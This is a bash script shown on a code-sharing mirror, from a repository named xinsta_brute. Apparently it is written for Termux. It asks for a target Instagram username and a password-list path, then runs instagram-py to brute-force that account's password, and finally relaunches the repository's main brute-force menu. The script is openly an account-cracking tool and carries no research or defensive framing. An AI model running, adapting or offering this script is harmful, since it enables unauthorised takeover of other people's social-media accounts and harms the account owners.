Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hackerxphantom
GitHub Repository: hackerxphantom/xinsta_brute
Path: blob/Master/custom-pass/custom-pass.sh
3 views
1
grn='\033[1;32m'
2
red='\033[1;31m'
3
rset='\033[0m'
4
ylo='\033[1;33m'
5
#!/bin/bash
6
clear
7
echo
8
echo '
9
10
__ ___ _ _ _
11
\ \/ (_)_ __ ___| |_ __ _ | |__ _ __ _ _| |_ ___
12
\ /| | |_ \/ __| __/ _| | | |_ \| |__| | | | __/ _ \
13
/ \| | | | \__ \ || (_| | | |_) | | | |_| | || __/
14
/_/\_\_|_| |_|___/\__\__,_|___|_.__/|_| \__,_|\__\___|
15
|_____|
16
[#] Manual Password Attack [#]
17
' |lolcat
18
printf "\n"
19
printf " \e[101m\e[1;77m >> Script By Hacker XPhantom (PH4N70M) << \e[0m\n"
20
printf "\n"
21
printf " \e[100m\e[1;77m >> Youtube Channel : \e[1;77m HACKER X PHANTOM \e[100m\e[1;77m << \e[0m\n"
22
printf "\n"
23
echo
24
read -p "[#] Enter Instagram ID/Username : " usrnm
25
echo
26
read -p "[#] Enter Password-list path : " inspass
27
echo
28
if [ $inspass = 0 ]
29
then
30
echo -e "$ylo >>> exiting........! Bye Bye :) <<<$rset"
31
else
32
33
instagram-py --username $usrnm --password-list $inspass
34
35
echo
36
sleep 30.0
37
cd /data/data/com.termux/files/home
38
fi
39
sleep 30.0
40
cd /data/data/com.termux/files/home/xinsta_brute
41
bash xinsta_brute.sh
42
43